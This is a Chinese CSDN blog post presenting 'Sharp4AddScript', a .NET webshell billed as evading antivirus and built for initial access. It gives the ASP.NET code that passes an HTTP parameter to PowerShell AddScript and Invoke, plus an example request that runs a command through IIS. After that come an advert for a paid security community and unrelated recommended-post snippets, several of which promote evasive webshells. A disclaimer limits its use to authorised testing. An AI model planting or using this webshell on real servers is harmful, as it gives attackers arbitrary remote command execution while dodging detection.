.NET 一款用于入口打点的免杀WebShell

于 2024-07-10 08:30:00 发布
阅读量357 收藏 8
点赞数 5
文章标签: .net web安全 安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140287115
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4AddScript是一款WebShell管理工具,通过接受HTTP请求中的参数来执行命令。该工具利用了PowerShell底层强大的功能,通过AddScript方法执行命令,能够在不依赖powershell.exe的环境中运行复杂的脚本。

图片

03使用方法

Sharp4AddScript的使用非常简单。只需通过HTTP请求发送包含要执行命令的参数即可。示例如下:

/Sharp4AddScript?con=winver

在上述示例中,工具将执行winver命令,显示Windows版本信息。

04实现代码

下面是Sharp4AddScript工具的实现代码。它是一个简单的.NET页面,包含必要的引用和命名空间导入,以及处理请求和执行命令的核心逻辑。首先是引入System.Management.Automation命名空间提供了PowerShell相关的类,Runspaces命名空间包含运行空间的相关类,用于执行PowerShell脚本,具体代码如下所示。

<%@ Import Namespace="System.Management.Automation" %>
<%@ Import Namespace="System.Management.Automation.Runspaces" %>

接着使用PowerShell.Create()创建一个PowerShell对象,调用AddScript方法添加要执行的脚本,具体如下所示。

using (PowerShell PowerShellInstance = PowerShell.Create())
{
     PowerShellInstance.AddScript(command);
     PowerShellInstance.Invoke();
}

提交参数con=winver.exe,运行后可见IIS进程已经启动了winver。如下图所示。

图片

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
基于javaweb+mysql的ssm+maven高校后勤报修系统(java+ssm+jsp+mysql)
欢迎私信,一直在线
02-25 649
基于javaweb+mysql的ssm+maven高校后勤报修系统(java+ssm+jsp+mysql)基于javaweb的SSM+Maven高校后勤报修系统(java+ssm+jsp+mysql)图片存放路径: src\main\webapp\upload,项目全路径不能有中文。eclipse/idea/myeclipse/sts等均可配置运行。课程设计,大作业,毕业设计,项目练习,学习演示等。2 管理员指派后勤人员。
计算机毕业设计项目之asp.net管理系统基于NET实现的数码新闻发布系统【源码+远程+答疑】
最新发布
weixin_45776178的博客
07-19 342
计算机毕业设计项目定制|源码定做asp.net-数码新闻发布系统演示视频 https://www.bilibili.com/video/BV1rp4y177q8?项目含有源码、文档、PPT、配套开发软件、软件安装教程、项目发布教程、包运行成功以及课程答疑与微信售后交流群、送查重系统不限次数免费查重等福利!软件开发环境及开发工具:开发软件:VS 2017 (版本2017以上即可,不能低于2017)数据库:mysql开发模式:mvc浏览器:谷歌浏览器。
渗透测试工具集(非常详细),从零基础入门到精通,看完这一篇就够了(附安装)
leah126的博客
01-31 2559
文件格式和网络协议剖析语言和Web IDE,使用C ++,C#,Java,JavaScript,Perl,PHP,Python,Ruby生成解析器。- 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。- Perl脚本,用于枚举域中的DNS信息,尝试区域传输,执行强力字典样式攻击,然后对结果执行反向查找。
2024我在CSDN的年度总结,一份如何变得优秀的秘籍(3)
X7gUWZnYP的博客
04-02 449
这一年八月,我有幸认识了CSDN的一些大佬,从此加入了CSDN博主的队伍。写博客对于我的成长,有着莫大的帮助,一来是巩固自己的知识,二来我很喜欢别人阅读我的博客,这是一个双向的过程,读我博客的人越多,我越有动力学习,越有动力写博客。
2016最新php免杀webshell安全
03-05
【过安全狗】:安全狗是一款常见的Web应用防火墙,主要用于保护服务器不受Web攻击。如果一个Webshell能够“过安全狗”,意味着它成功地避开了安全狗的检测规则,能够在安全狗的防护下运行。 【2016年的测试】:描述...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
Webshell通常被黑客用于远程控制和管理被入侵的Web服务器,而“免杀”则意味着这个Webshell设计得能够避开常规的安全防护措施,提高了其隐蔽性和持久性。 【描述】中的“免杀webshell”强调了这个Webshell的主要...
webshell:免杀webshell生成工具
04-13
免杀webshell生成工具 知识点:使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数 blog: command:python php_webshell.py 知识点:使用分隔关键字等绕过 blog: 知识点:使用自定义加密绕过杀软拼接...
一个ASP.Net下的WebShell实例
10-27
本文将详细解析一个特定的ASP.Net WebShell实例,它主要用于执行CMD命令,利用ASP.Net用户较高的权限来实现对服务器的非法操作。 ### WebShell的基本概念 WebShell通常是一个Web页面,它具有后门功能,允许攻击者...
特征码免杀webshell
05-04
特征码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
django求职招聘网站的设计和实现(程序+开题报告)
皇森斯毕设程序
02-14 1094
6] 郭婺, 郭建, 张劲松, 石翠萍, 刘道森, 刘超. 基于Python的网络爬虫的设计与实现[J]. 信息记录材料, 2023, 24 (04): 159-162.后端框架: Python开发的 Django 框架。[4] 张华, 翟新军, 胥勇, 李伟强, 杨健, 赵嘉伟, 张涛. Python在集控大数据应用的研究[J]. 价值工程, 2023, 42 (21): 84-86.总之,通过本研究的实施,将为求职者和企业提供一个功能全面、用户体验良好的求职招聘网站,促进就业市场的健康发展。
我的创作纪念日
白昼小丑的博客
02-25 437
提示:你过去写得最好的一段代码是什么?提示:当前创作和你的工作、学习是什么样的关系。提示:可以和大家分享最初成为创作者的初心。提示:在创作的过程中都有哪些收获。提示:职业规划、创作规划等​​。
通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core?
热门推荐
weixin_30435261的博客
07-02 2万+
什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先从类型系统开始讲起,我将通过跨语言操作这个例子来逐渐引入一系列.NET的相关概念,这主要包括:CLS、CTS(CLI)、FCL、Windows下CLR的相关核心组成、Windows下托管程序运行概念、什么是.NET Framework,.NET Core,.NET Standard及一些V...
Windows7系统ipsmsnap.dll文件丢失问题
amio555的专栏
02-14 851
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个ipsmsnap.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现ipsmsnap.dll丢失要怎么解决?
一键搭建你的hnust请假条
Rick的博客
12-07 829
湖南科技大学请假条生成器(直接使用)
C++实战项目-网络编程基础包含TCP详解
weixin_46120107的博客
08-24 5231
本篇从网络结构模式(网络应用程序设计模式)开始到TCP详解。对于网络编程的所有基础知识一文全部概述。清晰的表达,特别的解释方式,小白也能够看懂,带你打好socket编程的基础。(重点:对TCP从根上进行刨析)
每个.NET开发都应掌握的C#多线程知识点
zls365365的博客
11-23 195
上篇文章讲述了C#特性(Attribute)知识点,本文将介绍多线程的知识点。多线程编程是现代软件开发中的重要组成部分,它能够充分利用多核处理器,提高应用程序的性能和响应性。C#作为.NET开发的主要语言,提供了强大的多线程支持。本文将介绍C#多线程知识点,帮助.NET开发者更好地应对多线程编程。1.多线程基础1)进程是具有一定独立功能的程序关于某个数据集合上的一次运行活动,是系统进行资...
【华为OD】C卷真题 200分: 跳马 python代码实现[思路+代码]
十年以上编程经验的干货分享
03-01 180
马是象棋(包括中国象棋和国际象棋)中的棋子,走法是每步直一格再斜一格,即先横着或直着走一格,然后再斜着走一个对角线,可进可退,可越过河界,俗称“马走‘日’字。给顶m行n列的棋盘(网格图),棋盘上只有有棋子象棋中的棋子“马”,并且每个棋子有等级之分,等级为k的马可以跳1~k步(走的方式与象棋中“马”的规则一样,不可以超出棋盘位置),问是否能将所有马跳到同一位置,如果存在,输出最少需要的总步数(每匹马的步数相加),不存在则输出-1。
免杀webshell
10-17
我理解你的问题是如何编写一个免杀webshell。这是一个非常敏感的话题,因为 webshell 的使用可能会导致安全漏洞和数据泄露。因此,我不会提供任何有关编写 webshell 的具体指导。相反,我可以给你一些建议,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值